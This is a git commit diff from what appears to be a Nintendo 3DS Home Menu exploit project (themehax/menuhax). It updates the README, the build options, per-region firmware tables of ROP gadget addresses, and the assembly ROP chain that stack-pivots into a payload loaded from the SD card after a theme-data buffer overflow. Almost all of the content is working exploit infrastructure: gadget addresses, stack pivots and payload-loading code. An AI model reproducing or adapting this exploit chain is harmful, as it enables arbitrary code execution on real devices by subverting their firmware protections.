Added + updated ROP for initializing the rest of the data needed by h…

…blauncher. Booting into a different process when apps need it gets farther now, but it's still broken(hangs at red sub-screen). Added MEMSET32_OTHER to the ROP gadgets. Added prebuilt menurop for EUR v9.2 and EUR v9.3. Updated README. Updated installer version, and added a print when opening theme extdata fails. Removed debug code in archive.c.

Makefile

@@ -86,6 +86,11 @@ ifneq ($(strip $(ENABLE_LOADROPBIN)),)
 	DEFINES	:=	$(DEFINES) -DENABLE_LOADROPBIN
 endif
 
+ifneq ($(strip $(ENABLE_HBLAUNCHER)),)
+	PARAMS	:=	$(PARAMS) ENABLE_HBLAUNCHER=1
+	DEFINES	:=	$(DEFINES) -DENABLE_HBLAUNCHER
+endif
+
 ifeq ($(strip $(MENUROP_PATH)),)
 	MENUROP_PATH	:=	menurop
 endif

README.md

@@ -44,7 +44,8 @@ Build options:
 * "USE_PADCHECK=val" When set, at the very start of the menu ROP it will check if the current HID PAD state is set to the specified value. When they match, it continues the ROP, otherwise it returns to the homemenu code. This is done before writing to the framebuffers.
 * "GAMECARD_PADCHECK=val" Similar to USE_PADCHECK except for BOOTGAMECARD: the BOOTGAMECARD ROP only gets executed when the specified HID PAD state matches the current one. After writing to framebufs the ROP will delay 3 seconds, then run this PADCHECK ROP.
 * "EXITMENU=1" Terminate homemenu X seconds(see source) after getting code exec under the launched process.
-* "ENABLE_LOADROPBIN=1" Load a homemenu ropbin then stack-pivot to it, see the Makefile HEAPBUF_ROPBIN_* values for the load-address. When LOADSDPAYLOAD isn't used, the binary is the one specified by CODEBINPAYLOAD, otherwise it's loaded from "sd:/menuhax_ropbinpayload.bin". The binary size should be <=0x10000-bytes.
+* "ENABLE_LOADROPBIN=1" Load a homemenu ropbin then stack-pivot to it, see the Makefile HEAPBUF_ROPBIN_* values for the load-address. When LOADSDPAYLOAD isn't used, the binary is the one specified by CODEBINPAYLOAD, otherwise it's loaded from "sd:/menuhax_ropbinpayload.bin". The binary size should be <=0x8000-bytes.
+* "ENABLE_HBLAUNCHER=1" When used with ENABLE_LOADROPBIN, setup the additional data needed by the hblauncher payload.
 * "MENUROP_PATH={path}" Use the specified path for the "menurop" directory, instead of the default one which requires running generate_menurop_addrs.sh. To use the prebuilt menurop headers included with this repo, the following can be used: "MENUROP_PATH=menurop_prebuilt".
 * "THEMEDATA_PATH={*decompressed* regular theme body_LZ filepath}" Build hax with the specified theme, instead of using the "default theme" one. When Home Menu starts the actual rendering however, the gfx for the theme doesn't display properly due to the hax. BGM works fine, therefore this should only used for BGM-only themes(where the themedata header is all-zero except for the version and BGM fields). Also note that compression during building takes a *lot* longer with this.
 
@@ -57,6 +58,8 @@ When built with ENABLE_LOADROPBIN=1, this can boot into the homebrew-launcher if
 
 With the release archive, you have to hold down the L button while Home Menu is booting(at the time the ROP checks for it), in order to boot into the hblauncher payload. Otherwise, Home Menu will boot like normal.
 
+Even with the latest git builds, hblauncher still doesn't work quite right when the app requires booting into another process. It works fine when booting into a different process isn't needed however.
+
 # Installation
 To install the exploit for booting hblauncher, you *must* use the themehax_installer app. You must already have a way to boot into the hblauncher payload for running this app(which can include themehax if it's already setup): http://3dbrew.org/wiki/Homebrew_Exploits  
 The app requires an Internet connection for setting up the hblauncher payload. Once the app is booted, all you have to do is confirm that you want to install, the app will then auto detect + install everything.  
@@ -68,6 +71,8 @@ To "remove" the exploit, you can just select any theme in the Home Menu theme se
 
 If you *really* want to build a NCCH version of the installer, use the same permissions as 3ds_homemenu_extdatatool, with the same data on SD card as from the release archive.
 
+If you haven't already done so before, you may have to enter the Home Menu theme-settings so that Home Menu can create the theme extdata.
+
 # Credits
-* smea for payload.py. This is where the actual generation for the compressed data which triggers the buf-overflow is done.
+* This vuln was, as said on this page(https://smealum.github.io/3ds/), "exploited jointly by yellows8 and smea". The payload.py script was written by smea, this is where the actual generation for the compressed data which triggers the buf-overflow is done.
 

homemenu_ropgadget_script

@@ -20,6 +20,7 @@
 --patterndata=ea2d9f91d1fdb4bc29803e1f24dafd5b2f3aa3455579e356448933f149132243 --patternsha256size=0x18 "--plainout=#define ROP_INITOBJARRAY " --addval=0x1
 
 --patterndata=3dd9c6c8a88e2ee07f9d0debcb5ef3b5ff142f0b3c6548616418bb749bb4d860 --patternsha256size=0x1c "--plainout=#define MEMCPY "
+--patterndata=730f1de429d80d0f5e921d483b8078909870c94538bd3b400f1823010ab4c53e --patternsha256size=0x28 "--plainout=#define MEMSET32_OTHER "
 
 --patterndata=830c604f4c125a2e0bf80a8716809e21a75b0cd93e7a2c3a4bf4b096117f195c --patternsha256size=0x10 "--plainout=#define svcControlMemory "
 --patterndata=a424f8b938aa4919842c18cf173c854c6412bacc5bf48ff0abbb7164e69ec507 --patternsha256size=0x8 "--plainout=#define svcSleepThread "

menurop_prebuilt/EUR/11272

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020a40d
 
 #define MEMCPY 0x001536a0
+#define MEMSET32_OTHER 0x00210e1c
 
 #define svcControlMemory 0x00212df0
 #define svcSleepThread 0x0012e64c

menurop_prebuilt/EUR/12288

@@ -0,0 +1,51 @@
+#define STACKPIVOT_ADR 0x00100fdc
+#define ROP_LOADR4_FROMOBJR0 0x0010b64c
+#define ROP_POPPC 0x00102028
+#define POP_R0PC 0x001575ac
+#define POP_R1PC 0x00214988
+#define POP_R3PC 0x00102a24
+#define POP_R2R6PC 0x00150160
+#define POP_R4LR_BXR1 0x0011dda4
+#define POP_R4R8LR_BXR2 0x00136d5c
+#define POP_R4R5R6PC 0x00101b90
+
+#define ROP_STR_R1TOR0 0x00103f40
+#define ROP_LDR_R0FROMR0 0x0010efe8
+#define ROP_LDRR1R1_STRR1R0 0x001f1e7c
+#define ROP_MOVR1R3_BXIP 0x001b8708
+#define ROP_ADDR0_TO_R1 0x0012e708
+#define ROP_LDRR1_FROMR5ARRAY_R4WORDINDEX 0x001037d8
+#define ROP_CMPR0R1 0x0027e344
+
+#define ROP_INITOBJARRAY 0x0020a3a5
+
+#define MEMCPY 0x001536f8
+#define MEMSET32_OTHER 0x00210db4
+
+#define svcControlMemory 0x00212d88
+#define svcSleepThread 0x0012e64c
+
+#define SRV_GETSERVICEHANDLE 0x00212de0
+
+#define GXLOW_CMD4 0x0014d65c
+
+#define NSS_LaunchTitle 0x0020e640
+#define NSS_RebootSystem 0x00139874
+
+#define CFGIPC_SecureInfoGetRegion 0x00139d0c
+
+#define GSPGPU_Shutdown 0x0011da58
+#define GSPGPU_FlushDataCache 0x0014d558
+
+#define APT_SendParameter 0x00205ba0
+
+#define FS_MountSdmc 0x0011c9b4
+
+#define IFile_Open 0x00209f20
+#define IFile_Close 0x0020c148
+#define IFile_Read 0x00209e0c
+
+#define ROP_COND_THROWFATALERR 0x001028dc
+
+#define ORIGINALOBJPTR_BASELOADADR 0x002f0820
+

menurop_prebuilt/EUR/13330

@@ -0,0 +1,51 @@
+#define STACKPIVOT_ADR 0x00100fdc
+#define ROP_LOADR4_FROMOBJR0 0x0010b574
+#define ROP_POPPC 0x0010203c
+#define POP_R0PC 0x00154f0c
+#define POP_R1PC 0x002262bc
+#define POP_R3PC 0x00102a40
+#define POP_R2R6PC 0x001512c4
+#define POP_R4LR_BXR1 0x0011df68
+#define POP_R4R8LR_BXR2 0x00133f8c
+#define POP_R4R5R6PC 0x00101b94
+
+#define ROP_STR_R1TOR0 0x00103f58
+#define ROP_LDR_R0FROMR0 0x0010f01c
+#define ROP_LDRR1R1_STRR1R0 0x002003bc
+#define ROP_MOVR1R3_BXIP 0x001c2e24
+#define ROP_ADDR0_TO_R1 0x0012b64c
+#define ROP_LDRR1_FROMR5ARRAY_R4WORDINDEX 0x001037fc
+#define ROP_CMPR0R1 0x002946ac
+
+#define ROP_INITOBJARRAY 0x002190c5
+
+#define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222784
+
+#define svcControlMemory 0x002246d4
+#define svcSleepThread 0x0012b590
+
+#define SRV_GETSERVICEHANDLE 0x0022472c
+
+#define GXLOW_CMD4 0x0014ac9c
+
+#define NSS_LaunchTitle 0x0022024c
+#define NSS_RebootSystem 0x00136a0c
+
+#define CFGIPC_SecureInfoGetRegion 0x00136ea4
+
+#define GSPGPU_Shutdown 0x0011dc1c
+#define GSPGPU_FlushDataCache 0x0014ab98
+
+#define APT_SendParameter 0x00214ab0
+
+#define FS_MountSdmc 0x0011cacc
+
+#define IFile_Open 0x00218c3c
+#define IFile_Close 0x0021dcdc
+#define IFile_Read 0x00218b3c
+
+#define ROP_COND_THROWFATALERR 0x001028f8
+
+#define ORIGINALOBJPTR_BASELOADADR 0x0031382c
+

menurop_prebuilt/EUR/14336

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x002190a5
 
 #define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222764
 
 #define svcControlMemory 0x002246b4
 #define svcSleepThread 0x0012b590

menurop_prebuilt/EUR/15360

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x00219031
 
 #define MEMCPY 0x00150930
+#define MEMSET32_OTHER 0x0022272c
 
 #define svcControlMemory 0x0022467c
 #define svcSleepThread 0x0012b584

menurop_prebuilt/EUR/16404

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf45
 
 #define MEMCPY 0x001535ac
+#define MEMSET32_OTHER 0x00233914
 
 #define svcControlMemory 0x00235730
 #define svcSleepThread 0x0012b0a0

menurop_prebuilt/EUR/17415

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022be09
 
 #define MEMCPY 0x001536f0
+#define MEMSET32_OTHER 0x002337c4
 
 #define svcControlMemory 0x002355ec
 #define svcSleepThread 0x0012b044

menurop_prebuilt/EUR/19456

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf11
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002338cc
 
 #define svcControlMemory 0x002356f4
 #define svcSleepThread 0x0012b070

menurop_prebuilt/EUR/20480

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf2d
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002338e8
 
 #define svcControlMemory 0x00235710
 #define svcSleepThread 0x0012b070

menurop_prebuilt/JPN/13313

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020958d
 
 #define MEMCPY 0x00153068
+#define MEMSET32_OTHER 0x0020ff9c
 
 #define svcControlMemory 0x00211f70
 #define svcSleepThread 0x0012e184

menurop_prebuilt/JPN/14336

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020a40d
 
 #define MEMCPY 0x001536a0
+#define MEMSET32_OTHER 0x00210e1c
 
 #define svcControlMemory 0x00212df0
 #define svcSleepThread 0x0012e64c

menurop_prebuilt/JPN/15360

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020a3a5
 
 #define MEMCPY 0x001536f8
+#define MEMSET32_OTHER 0x00210db4
 
 #define svcControlMemory 0x00212d88
 #define svcSleepThread 0x0012e64c

menurop_prebuilt/JPN/16402

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x002190c5
 
 #define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222784
 
 #define svcControlMemory 0x002246d4
 #define svcSleepThread 0x0012b590

menurop_prebuilt/JPN/17408

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x002190a5
 
 #define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222764
 
 #define svcControlMemory 0x002246b4
 #define svcSleepThread 0x0012b590

menurop_prebuilt/JPN/18432

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x00219031
 
 #define MEMCPY 0x00150930
+#define MEMSET32_OTHER 0x0022272c
 
 #define svcControlMemory 0x0022467c
 #define svcSleepThread 0x0012b584

menurop_prebuilt/JPN/19476

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf45
 
 #define MEMCPY 0x001535ac
+#define MEMSET32_OTHER 0x00233914
 
 #define svcControlMemory 0x00235730
 #define svcSleepThread 0x0012b0a0

menurop_prebuilt/JPN/20487

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022be09
 
 #define MEMCPY 0x001536f0
+#define MEMSET32_OTHER 0x002337c4
 
 #define svcControlMemory 0x002355ec
 #define svcSleepThread 0x0012b044

menurop_prebuilt/JPN/22528

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf11
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002338cc
 
 #define svcControlMemory 0x002356f4
 #define svcSleepThread 0x0012b070

menurop_prebuilt/JPN/23552

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf2d
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002338e8
 
 #define svcControlMemory 0x00235710
 #define svcSleepThread 0x0012b070

menurop_prebuilt/USA/11272

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020a40d
 
 #define MEMCPY 0x001536a0
+#define MEMSET32_OTHER 0x00210e1c
 
 #define svcControlMemory 0x00212df0
 #define svcSleepThread 0x0012e64c

menurop_prebuilt/USA/12288

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0020a3a5
 
 #define MEMCPY 0x001536f8
+#define MEMSET32_OTHER 0x00210db4
 
 #define svcControlMemory 0x00212d88
 #define svcSleepThread 0x0012e64c

menurop_prebuilt/USA/13330

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x002190c5
 
 #define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222784
 
 #define svcControlMemory 0x002246d4
 #define svcSleepThread 0x0012b590

menurop_prebuilt/USA/14336

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x002190a5
 
 #define MEMCPY 0x00150940
+#define MEMSET32_OTHER 0x00222764
 
 #define svcControlMemory 0x002246b4
 #define svcSleepThread 0x0012b590

menurop_prebuilt/USA/15360

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x00219031
 
 #define MEMCPY 0x00150930
+#define MEMSET32_OTHER 0x0022272c
 
 #define svcControlMemory 0x0022467c
 #define svcSleepThread 0x0012b584

menurop_prebuilt/USA/16404

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf45
 
 #define MEMCPY 0x001535ac
+#define MEMSET32_OTHER 0x00233914
 
 #define svcControlMemory 0x00235730
 #define svcSleepThread 0x0012b0a0

menurop_prebuilt/USA/17415

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022be09
 
 #define MEMCPY 0x001536f0
+#define MEMSET32_OTHER 0x002337c4
 
 #define svcControlMemory 0x002355ec
 #define svcSleepThread 0x0012b044

menurop_prebuilt/USA/19456

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bf11
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002338cc
 
 #define svcControlMemory 0x002356f4
 #define svcSleepThread 0x0012b070

menurop_prebuilt/USA/20480

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bdc9
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x00233784
 
 #define svcControlMemory 0x002355ac
 #define svcSleepThread 0x0012b070

menurop_prebuilt/USA/21504

@@ -20,6 +20,7 @@
 #define ROP_INITOBJARRAY 0x0022bde5
 
 #define MEMCPY 0x00153720
+#define MEMSET32_OTHER 0x002337a0
 
 #define svcControlMemory 0x002355c8
 #define svcSleepThread 0x0012b070

themedata_payload.s

@@ -345,7 +345,7 @@ COND_THROWFATALERR
 CALLFUNC_NOSP IFile_Open, (HEAPBUF + (IFile_ctx - _start)), (HEAPBUF + (sdfile_ropbin_path - _start)), 1, 0
 COND_THROWFATALERR
 
-CALLFUNC_NOSP IFile_Read, (HEAPBUF + (IFile_ctx - _start)), (HEAPBUF + (tmp_scratchdata - _start)), ROPBIN_BUFADR, 0x10000
+CALLFUNC_NOSP IFile_Read, (HEAPBUF + (IFile_ctx - _start)), (HEAPBUF + (tmp_scratchdata - _start)), ROPBIN_BUFADR, 0x8000
 COND_THROWFATALERR
 
 ROP_SETLR ROP_POPPC
@@ -358,6 +358,13 @@ ROP_SETLR ROP_POPPC
 .word IFile_Close
 #endif
 
+#ifdef ENABLE_HBLAUNCHER
+CALLFUNC_NOSP MEMCPY, ROPBIN_BUFADR+0x8000, ROPBIN_BUFADR, 0x8000, 0 @ ropbin backup
+CALLFUNC_NOSP MEMSET32_OTHER, ROPBIN_BUFADR - (0x800*2), 0x800, 0, 0 @ paramblk
+
+CALLFUNC_NOSP GSPGPU_FlushDataCache, ROPBIN_BUFADR - (0x800*2), 0x11000, 0, 0
+#endif
+
 ROPMACRO_STACKPIVOT ROPBIN_BUFADR, ROP_POPPC
 #endif